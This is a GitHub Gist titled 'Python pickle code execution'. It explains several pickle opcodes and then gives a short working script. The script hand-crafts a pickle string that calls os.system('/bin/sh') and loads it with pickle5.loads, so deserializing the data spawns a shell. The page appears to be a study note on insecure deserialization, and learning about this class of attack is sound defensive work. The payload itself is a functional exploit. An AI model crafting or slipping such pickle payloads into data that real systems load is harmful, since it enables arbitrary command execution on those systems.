- c: Read to the newline as the module name, module. Read the next line as the object name, object. Push module.object onto the stack.
- (: Insert a marker object onto the stack. For our purpose, this is paired with t to produce a tuple.
- t: Pop objects off the stack until a ( is popped and create a tuple object containing the objects popped (except for the () in the order they were /pushed/ onto the stack. The tuple is pushed onto the stack
- S: Read the string in quotes up to the newline and push it onto the stack.
- R: Pop a tuple and a callable off the stack and call the callable with the tuple as arguments. Push the result onto the stack.
- .: End of the pickle.
Created
April 3, 2022 11:17
-
-
Save sokil/655b1fad8f7bc5f2551b1cb640cabe2d to your computer and use it in GitHub Desktop.
Python pickle code execution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #https://checkoway.net/musings/pickle/ | |
| import pickle5 | |
| s = """cos | |
| system | |
| (S'/bin/sh' | |
| tR.""" | |
| pickle5.loads(str.encode(s)) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment